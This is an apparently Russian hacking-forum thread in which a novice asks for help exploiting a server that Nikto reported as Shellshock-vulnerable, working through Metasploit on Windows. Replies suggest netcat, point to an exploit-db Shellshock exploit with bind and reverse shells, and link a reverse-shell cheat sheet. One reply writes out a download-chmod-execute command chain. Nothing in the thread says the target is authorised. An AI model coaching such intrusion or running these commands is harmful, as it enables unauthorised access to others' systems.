Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Ёбнутый но срочный вопрос (https://forum.antichat.xyz/showthread.php?t=460542)

Sensoft 17.02.2018 01:50

На 2:39 что он делает ?

У меня win через мету всё точно повторил и вроде как получилось но я линукс не юзаю

Я так понял он вызвал shell или типа того

Как это сделать на win ?

d1v 17.02.2018 01:58

коннектится неткатом к хосту

https://1cloud.ru/help/windows/netcat-na-windows

Sensoft 17.02.2018 01:59

Цитата:

Сообщение от d1v
d1v said:

коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows

спасибо

Sensoft 17.02.2018 02:08

Цитата:

Сообщение от d1v
d1v said:

коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows

https://s8.hostingkartinok.com/uploa...f334263883.png

Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?

тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него

altblitz 17.02.2018 02:34

Цитата:

Сообщение от Sensoft
Sensoft said:

https://s8.hostingkartinok.com/uploa...f334263883.png
Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?
тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него

Получается, что нужно запускать сплойт в Command Prompt (Admin).

Sensoft 17.02.2018 02:37

Цитата:

Сообщение от altblitz
altblitz said:

Получается, что нужно запускать сплойт в Command Prompt (
Admin
).

подробнее можно ?

Sensoft 17.02.2018 02:44

Цитата:

Сообщение от altblitz
altblitz said:

Получается, что нужно запускать сплойт в Command Prompt (
Admin
).

какой смысл запускать cmd от админа ? это на метосплоит вообще не как не влияет

Sensoft 17.02.2018 02:48

Код:

Code:
+ OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /restore_config.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2 14-6271).


zifus 17.02.2018 03:05

возьми шел на питоне

_https://www.exploit-db.com/exploits/34900/

Там есть и бинд и реверс..

Для таких вещей нужно пересаживаться на linux, и куча вопросов отпадет сама по себе.

А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc

Sensoft 17.02.2018 03:19

Цитата:

Сообщение от zifus
zifus said:

А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc

99% что этого нет )

nc получается обязано быть (

ну тогда всё тупик

VY_CMa 17.02.2018 12:08

Цитата:

Сообщение от Sensoft
Sensoft said:

99% что этого нет )
nc получается обязано быть (
ну тогда всё тупик

nc не обязано быть. Тебе дали ответ: используй интерпретаторы для бинда и реверса. На крайний случай можно и скачать что-то: wget http://file, chmod +x /tmp/file, /tmp/file

zifus 17.02.2018 13:15

Цитата:

Сообщение от Sensoft
Sensoft said:

ну тогда всё тупик

http://pentestmonkey.net/cheat-sheet...ll-cheat-sheet


Время: 20:22